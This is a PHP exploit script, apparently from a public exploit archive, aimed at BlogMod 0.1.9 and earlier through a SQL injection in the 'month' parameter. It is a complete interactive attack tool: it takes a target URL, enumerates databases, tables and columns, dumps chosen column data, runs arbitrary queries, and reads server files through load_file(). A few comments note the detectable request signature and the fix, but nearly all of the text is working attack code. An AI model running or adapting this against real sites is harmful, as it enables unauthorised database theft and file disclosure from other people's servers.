<?php
/*
# Exploit Title: BlogMod <= 0.1.9 SQLi Exploit
# Date: 04th october 2012
# Exploit Author: WhiteCollarGroup
# Software Link: http://www.codigofonte.net/scripts/php/blog/367_blog-mod
# Version: 0.1.9
~> How does this exploit work?
It exploits one of the several SQL Injections in the system.
Specifically, in the file "index.php", parameter "month".
Usage:
php filename.php
*/

// Prints $str to stdout followed by a newline.
function puts($str)
{
    echo $str."\n";
}

// Reads one line from STDIN and strips surrounding whitespace.
function gets()
{
    return trim(fgets(STDIN));
}

// Encodes $string byte by byte as a MySQL hex literal ("0x..."), so the
// value can be placed in a query without quote characters.
function hex($string)
{
    $hex='';
    // PHP 'Dim' =]
    for($i=0;$i<strlen($string);$i++){
        $hex.=dechex(ord($string[$i]));
    }
    return '0x'.$hex;
}

// Per-run marker (uniqid()) that delimits the injected result in the HTTP
// response; its hex form is what gets embedded in the query.
$token=uniqid();
$token_hex=hex($token);
puts("BlogMod <= X SQL Injection Exploit");
puts("By WhiteCollarGroup");
puts("[?] Enter website URL (e. g.: http://www.target.com/blogmod/):");
$target=gets();
puts("[*] Checking...");
// Reachability check: errors are @-suppressed and any falsy body aborts.
if(!@file_get_contents($target))die("[!] Access error: check domain and path.");
// Ensure a trailing slash so "index.php" can be appended below.
if(substr($target,(strlen($target)-1))!="/")$target.="/";

// Runs $query through the UNION-based injection in the "month" parameter of
// index.php (see header comment). The query's single result is wrapped in
// concat() between two copies of $token and then extracted from the page
// body with a regex. Returns the extracted string, or false when the
// delimiters are not found. Reads $target/$token/$token_hex via global.
//
// From the server side: the request is a plain GET whose "month" value is
// not numeric and contains "union all select" — a signature a WAF or access
// log rule can key on. The fix is to parameterise or cast the month value.
function runquery($query)
{
    global $target,$token,$token_hex;
    // Drop a trailing semicolon; it would break the UNION-appended query.
    $query=preg_replace("/;$/",null,$query);
    $query=urlencode($query);
    $rodar=$target."index.php?year=2012&month=-0%20union%20all%20select%201,2,concat%28$token_hex,%28$query%29,$token_hex%29,4,5,6--%20";
    $get=file_get_contents($rodar);
    $matches=array();
    preg_match_all("/$token(.*)$token/",$get,$matches);
    if(isset($matches[1][0]))return $matches[1][0];
    else return false;
}

// Sanity check: if the marker cannot be echoed back, the injection point is
// not usable here and the script stops without a message.
if(runquery("SELECT $token_hex")!=$token){
    // error
    exit;
}

// Interactive menu. Each branch re-enters main() (recursion, no loop);
// $msg, when given, is printed above the menu on re-entry.
// Option 3 relies on MySQL load_file(), which needs the FILE privilege and
// a readable path — hence the "may not have priv" prompt.
function main($msg=null)
{
    global $token,$token_hex;
    echo "\n".$msg."\n";
    puts("[>] MAIN MENU");
    puts("[1] Browse MySQL");
    puts("[2] Run SQL Query");
    puts("[3] Read file");
    puts("[4] About");
    puts("[0] Exit");
    $resp=gets();
    if($resp=="0")
        exit;
    elseif($resp=="1"){
        // fetch databases one row at a time until runquery() returns false
        $i=0;
        puts("[.] Getting databases:");
        while(true){
            $pega=runquery("SELECT schema_name FROM information_schema.schemata LIMIT $i,1");
            if($pega)puts(" - ".$pega);
            else break;
            $i++;
        }
        puts("[!] Current database: ".runquery("SELECT database()"));
        puts("[?] Enter database name for select:");
        $own=array();
        $own['db']=gets();
        $own['dbh']=hex($own['db']);
        // fetch tables of the chosen db
        $i=0;
        puts("[.] Getting tables from $own[db]:");
        while(true){
            $pega=runquery("SELECT table_name FROM information_schema.tables WHERE table_schema=$own[dbh] LIMIT $i,1");
            if($pega)puts(" - ".$pega);
            else break;
            $i++;
        }
        puts("[?] Enter table name for select:");
        $own['tb']=gets();
        $own['tbh']=hex($own['tb']);
        // fetch columns of the chosen table
        $i=0;
        puts("[.] Getting columns from $own[db].$own[tb]:");
        while(true){
            $pega=runquery("SELECT column_name FROM information_schema.columns WHERE table_schema=$own[dbh] AND table_name=$own[tbh] LIMIT $i,1");
            if($pega)puts(" - ".$pega);
            else break;
            $i++;
        }
        puts("[?] Enter columns name, separated by commas (\",\") for select:");
        $own['cl']=explode(",",gets());
        // fetch the rows of each chosen column (user input is used unquoted)
        foreach($own['cl'] as $coluna){
            $i=0;
            puts("[=] Column: $coluna");
            while(true){
                $pega=runquery("SELECT $coluna FROM $own[db].$own[tb] LIMIT $i,1");
                if($pega){
                    puts(" - $pega");
                    $i++;
                }
                else break;
            }
            echo "\n[ ] -+-\n";
        }
        main();
    }
    elseif($resp=="2"){
        puts("[~] RUN SQL QUERY");
        puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");
        puts("[?] Query (enter for exit): ");
        $query=gets();
        // Empty input (also "0") returns to the menu without a request.
        if(!$query)main();
        else main(runquery($query."\n"));
    }
    elseif($resp=="3"){
        puts("[?] 
File path (may not have priv):");
        $file=hex(gets());
        $le=runquery("SELECT load_file($file) AS wc");
        if($le)main($le);
        else main("File not found, empty or no priv!");
    }
    elseif($resp=="4"){
        puts("Coded by WhiteCollarGroup");
        puts("www.wcgroup.host56.com");
        puts("whitecollar_group@hotmail.com");
        puts("twitter.com/WCollarGroup");
        puts("facebook.com/WCollarGroup");
        puts("wcollargroup.blogspot.com");
        main();
    }
    else main("[!] Wrong choice.");
}
main();